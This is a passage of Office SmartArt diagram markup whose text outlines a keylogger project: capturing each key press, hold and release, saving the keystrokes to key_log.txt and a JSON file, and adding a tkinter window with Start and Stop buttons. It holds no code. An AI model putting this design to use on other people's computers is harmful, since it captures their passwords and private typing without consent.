    <dgm:cxn modelId="{2BBF37A7-FB0F-4821-846F-A645E59075B9}" type="presParOf" srcId="{6AE3A4D9-A187-45D9-BDA2-FA65A303CFA7}" destId="{2C47002B-861F-4068-A7F6-3244CEC2C4BC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{46252157-6D54-410F-9EFE-FA7875B402A5}" type="presParOf" srcId="{D0B70D9B-E250-4083-ADC3-5AAFE8232031}" destId="{97819751-5DE6-4CE9-9264-C80556C77712}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{25DBAF8E-280B-4076-AF4B-C4A85FC78808}" type="presParOf" srcId="{D0B70D9B-E250-4083-ADC3-5AAFE8232031}" destId="{5E268A5D-991E-41BC-8A4F-0EA914C2E772}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{A081C4F5-033B-4487-9780-756D879B7406}" type="presParOf" srcId="{5E268A5D-991E-41BC-8A4F-0EA914C2E772}" destId="{EA76F5EB-5CF4-4C90-889A-692BDB77F22D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{F8CC1891-7A9A-48F2-B178-7A1DDF5B23F4}" type="presParOf" srcId="{5E268A5D-991E-41BC-8A4F-0EA914C2E772}" destId="{53B2F193-D487-4957-A8D9-3C610D1BEF4C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{71AFCDA7-4488-477E-8599-8701FCDBD3DE}" type="presParOf" srcId="{D0B70D9B-E250-4083-ADC3-5AAFE8232031}" destId="{87336550-3802-44E7-B720-D46E8FE298C4}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{940B9844-C181-43BF-94A0-1A8EA5E98ED9}" type="presParOf" srcId="{D0B70D9B-E250-4083-ADC3-5AAFE8232031}" destId="{C76DAE61-D3F2-4449-BA00-A97B2B058764}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{034D9C30-F344-4B3C-B724-86041D2E2FFA}" type="presParOf" srcId="{C76DAE61-D3F2-4449-BA00-A97B2B058764}" destId="{1DD37B6D-9FBE-4052-8E7A-A35F6C36EF86}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{A1789604-E192-40EA-B4C1-36B1CD33BA3B}" type="presParOf" srcId="{C76DAE61-D3F2-4449-BA00-A97B2B058764}" destId="{47A37E47-2337-4B6C-8A84-7A9F8FE2AEA6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{45ECCE03-CC5B-483B-BB3D-3A0D2378EBC9}" type="presParOf" srcId="{D0B70D9B-E250-4083-ADC3-5AAFE8232031}" destId="{A9A97887-1624-4694-9EEF-FBB845EB9DD3}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{487A8952-50C7-41F2-B64F-E4B6622B4AB8}" type="presParOf" srcId="{D0B70D9B-E250-4083-ADC3-5AAFE8232031}" destId="{68829E88-2ECA-49B8-B5B1-713FAA0CD7E4}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{9C0BCC14-2902-48DB-8B3D-344F02F86EF4}" type="presParOf" srcId="{68829E88-2ECA-49B8-B5B1-713FAA0CD7E4}" destId="{53CA09FB-C003-4A5F-90C5-820C7964D2FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{E766E9E3-DDD8-4BD7-8C20-30D3D39B8321}" type="presParOf" srcId="{68829E88-2ECA-49B8-B5B1-713FAA0CD7E4}" destId="{2A216FFF-8446-43FE-B954-ADDB54D9D913}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{7F4A4013-D57B-4F9E-BD8A-C82BEBA2E077}" type="presParOf" srcId="{D0B70D9B-E250-4083-ADC3-5AAFE8232031}" destId="{901AD9DF-BDFD-4032-8A3C-1E3F91BB8097}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{1FB614C2-2659-4D9B-AEE4-808947A54162}" type="presParOf" srcId="{D0B70D9B-E250-4083-ADC3-5AAFE8232031}" destId="{F99421E5-1DD2-43E2-A96B-A4FC9E6A6198}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{125BC44E-9655-41AC-8865-05195263AC7B}" type="presParOf" srcId="{F99421E5-1DD2-43E2-A96B-A4FC9E6A6198}" destId="{33E2AF8D-F85D-4460-AA23-340C6856C082}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{51CEC7AA-8EF2-4E72-B332-934285B9EE22}" type="presParOf" srcId="{F99421E5-1DD2-43E2-A96B-A4FC9E6A6198}" destId="{6023E624-1713-4646-95E0-9B199660DB5D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{14C738EB-7826-4B34-9DAA-1CB443293535}" type="presParOf" srcId="{D0B70D9B-E250-4083-ADC3-5AAFE8232031}" destId="{F6EA2444-C5D7-4261-BF2E-53177D5550D2}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{5BC62923-E0F4-4B51-B9C8-88190834B9D6}" type="presParOf" srcId="{D0B70D9B-E250-4083-ADC3-5AAFE8232031}" destId="{C7C3D2EB-5AA5-4BF5-ACAA-A29700A7C3DE}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{FA57DECF-D64D-4C33-AD24-EB4B6C76714D}" type="presParOf" srcId="{C7C3D2EB-5AA5-4BF5-ACAA-A29700A7C3DE}" destId="{CA24E6F5-9463-421F-94B8-AD78A2CABF86}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{24A17415-C8F4-4E21-B56A-23E99C56821C}" type="presParOf" srcId="{C7C3D2EB-5AA5-4BF5-ACAA-A29700A7C3DE}" destId="{66D81D17-02CF-469A-A1F6-CFB059B3A8CD}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{D54B9357-81F8-44B8-BA08-FBE20CBD19F8}" type="presParOf" srcId="{D0B70D9B-E250-4083-ADC3-5AAFE8232031}" destId="{D4E7F4C1-0C36-44F8-8B9A-D0C2F09CC3C1}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{79431866-FE8E-4E42-8794-5C677A1CC394}" type="presParOf" srcId="{D0B70D9B-E250-4083-ADC3-5AAFE8232031}" destId="{A83282CB-2575-4411-86C8-87403B9B12AA}" srcOrd="14" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{C0CAFEA7-FC19-4156-89E3-8D52599D2E51}" type="presParOf" srcId="{A83282CB-2575-4411-86C8-87403B9B12AA}" destId="{5EAD1D50-E5C3-4A9F-947D-DE722C1250AC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList3"/>
    <dgm:cxn modelId="{22DEF35D-5075-4299-9752-FA7BBD46CA2B}" type="presParOf" srcId="{A83282CB-2575-4411-86C8-87403B9B12AA}" destId="{A3935545-314F-48BB-BB4A-23E09CFCC263}"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DF12EC-40FB-4852-A90C-C2C7D8A6BF72}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#1" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/3d1#1" qsCatId="3D" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2#1" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B93CBCD6-F71C-4851-BC09-1F5C797DD0B9}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>1.Capture Keystrokes:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2BF4CB66-56A2-4BA5-82D7-38F812236420}" type="parTrans" cxnId="{04829E30-A5B4-4458-97C4-D4C963E1F8D4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{749D3DA5-0642-44D9-9AFE-5B180B73E639}" type="sibTrans" cxnId="{04829E30-A5B4-4458-97C4-D4C963E1F8D4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{12AD88A9-497E-481F-8B6D-31CAAD572DC6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="800" b="0" i="0" baseline="0" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Detect and log each key press, hold, and release event.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0">
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA488877-DA8E-4703-9FF8-8686DA823883}" type="parTrans" cxnId="{432E5461-9B81-4218-AA1B-07A47CF5EB37}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BAF11084-F91F-454D-95B8-A943052F3EA4}" type="sibTrans" cxnId="{432E5461-9B81-4218-AA1B-07A47CF5EB37}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7536AB6E-3BB2-4D1F-A318-0ECDA724FEE2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="800" b="0" i="0" baseline="0" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Store the logged keystrokes in a list.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0">
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A9ED6A5C-EFED-45CA-A84F-1C980075855A}" type="parTrans" cxnId="{52A8E777-3038-4171-BA31-ED92FA3C1DA0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5FAD7DE8-FE34-4353-B352-BC90F951BBA0}" type="sibTrans" cxnId="{52A8E777-3038-4171-BA31-ED92FA3C1DA0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B27B1121-5AAA-4C32-8475-D10082E9EF1B}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>2.</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Log Storage</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="0" i="0" baseline="0" dirty="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dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5DE7DF5D-0521-4B52-BC2B-602FB60E5B01}" type="parTrans" cxnId="{2C894CCB-32D1-472F-A1AD-6E511A74AA67}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EC732255-80CD-41DF-A38B-22FBD153AD66}" type="sibTrans" cxnId="{2C894CCB-32D1-472F-A1AD-6E511A74AA67}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{33668DFE-79D4-4705-8FD8-931167E899E4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="800" b="0" i="0" baseline="0" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Save the keystrokes in a text file named key_log.txt.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0">
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{38D3A2B4-0AA3-4C89-AE00-F958CFF699C8}" type="parTrans" cxnId="{0A9F42CB-21DE-4C5E-AAA3-9A01D8BCB6AE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{74BB7AB8-3877-4006-8ABF-5C4E57D38899}" type="sibTrans" cxnId="{0A9F42CB-21DE-4C5E-AAA3-9A01D8BCB6AE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7ACBF37F-B181-4B7F-BA67-F1108A286FF2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="800" b="0" i="0" baseline="0" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Save the keystrokes in a JSON file named key-log. Json.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0">
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1EEAC72C-D380-41A1-BF60-F6267D2F7C2F}" type="parTrans" cxnId="{C8AE6530-C5D2-434B-9C3B-289BE5B25144}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4EDF53F1-1AAB-4730-8D79-376004E5C59B}" type="sibTrans" cxnId="{C8AE6530-C5D2-434B-9C3B-289BE5B25144}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6E193C09-BFC3-4B76-9F52-18B43E4E6675}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>3.Graphical User Interface (GUI)</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="0" i="0" baseline="0" dirty="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dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8F1593AF-3B86-453C-971E-A5709C5A6A39}" type="parTrans" cxnId="{71DBD705-2839-442D-B310-15A8709FFCB4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A11D2D5-4A8F-4414-B315-3B7EF03B8A4D}" type="sibTrans" cxnId="{71DBD705-2839-442D-B310-15A8709FFCB4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{17555B28-C959-41A3-AF3F-DE8C8AF52CB1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="800" b="0" i="0" baseline="0" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Provide a simple GUI using the tkinter library.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0">
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1840D8D3-28C9-45CE-8A44-CEB4761F5F28}" type="parTrans" cxnId="{3C443F0C-3222-4F81-B0E3-FB82A96EBD41}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7C1CCA8F-07AA-440D-A8A4-B20C3E87CC83}" type="sibTrans" cxnId="{3C443F0C-3222-4F81-B0E3-FB82A96EBD41}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{20FCF9A6-7D24-4220-B35A-D2E49116DE91}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="800" b="0" i="0" baseline="0" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Include "Start" and "Stop" buttons to control the keylogger.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0">
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A5771A1A-7953-478A-A192-786F517A6902}" type="parTrans" cxnId="{910A054E-6509-4A1A-8F24-4AA9427ED03C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CF4AA76E-9D15-4E36-8B87-8234DDF8653D}" type="sibTrans" cxnId="{910A054E-6509-4A1A-8F24-4AA9427ED03C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C6B71EEC-D880-4100-B878-BD3A0B6FF7B2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="800" b="0" i="0" baseline="0" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Display the status of the keylogger (running or stopped) in the GUI</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="800" b="0" i="0" baseline="0" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B9553BAD-2274-4EEC-9E6E-6E42732F8E33}" type="parTrans" cxnId="{3A3B3549-C725-464E-BEB4-909188BA94CF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B6B91B7A-C62D-4AB5-814F-D1400CA099A6}" type="sibTrans" cxnId="{3A3B3549-C725-464E-BEB4-909188BA94CF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2DEF037C-FCBC-4968-8920-E469C6F74F78}" type="pres">
      <dgm:prSet presAssocID="{51DF12EC-40FB-4852-A90C-C2C7D8A6BF72}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{628F9F94-476C-48F1-94BE-EC3D86C96236}" type="pres">
      <dgm:prSet presAssocID="{51DF12EC-40FB-4852-A90C-C2C7D8A6BF72}" presName="fgShape" presStyleLbl="fgShp" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{13A1F99F-3B7B-4E9A-8136-C8AEA8613974}" type="pres">
      <dgm:prSet presAssocID="{51DF12EC-40FB-4852-A90C-C2C7D8A6BF72}" presName="linComp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D842D1CE-AA6D-43F8-97DA-80D26645A9BF}" type="pres">
      <dgm:prSet presAssocID="{B93CBCD6-F71C-4851-BC09-1F5C797DD0B9}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A9D64408-CF09-4222-A018-74CA13DACEC9}" type="pres">
      <dgm:prSet presAssocID="{B93CBCD6-F71C-4851-BC09-1F5C797DD0B9}" presName="bkgdShape" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B3AB0F58-A88E-49C8-B3F6-DE1819888600}" type="pres">
      <dgm:prSet presAssocID="{B93CBCD6-F71C-4851-BC09-1F5C797DD0B9}" presName="nodeTx" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D434F777-8A96-4906-AE04-DDCDEDF531E5}" type="pres">
      <dgm:prSet presAssocID="{B93CBCD6-F71C-4851-BC09-1F5C797DD0B9}" presName="invisiNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C8CB6295-04BE-4EA4-9F6A-BF9482E09C6C}" type="pres">
      <dgm:prSet presAssocID="{B93CBCD6-F71C-4851-BC09-1F5C797DD0B9}" presName="imagNode" presStyleLbl="fgImgPlace1" presStyleIdx="0" presStyleCnt="3" custLinFactNeighborX="-738" custLinFactNeighborY="232"/>
      <dgm:spPr>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dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{9294B1DA-B631-463F-89D9-B2F519C3513B}" type="pres">
      <dgm:prSet presAssocID="{749D3DA5-0642-44D9-9AFE-5B180B73E639}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{169BC4A1-B086-47DC-9D9B-183D204F5C95}" type="pres">
      <dgm:prSet presAssocID="{B27B1121-5AAA-4C32-8475-D10082E9EF1B}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BCF7B15A-721B-468A-82AE-D533A5DC693B}" type="pres">
      <dgm:prSet presAssocID="{B27B1121-5AAA-4C32-8475-D10082E9EF1B}" presName="bkgdShape" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3EE018A5-4DD7-4393-932E-B2CCAEC7B57A}" type="pres">
      <dgm:prSet presAssocID="{B27B1121-5AAA-4C32-8475-D10082E9EF1B}" presName="nodeTx" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{40F76B6B-014D-43CA-ACAB-79F1C2E44FF8}" type="pres">
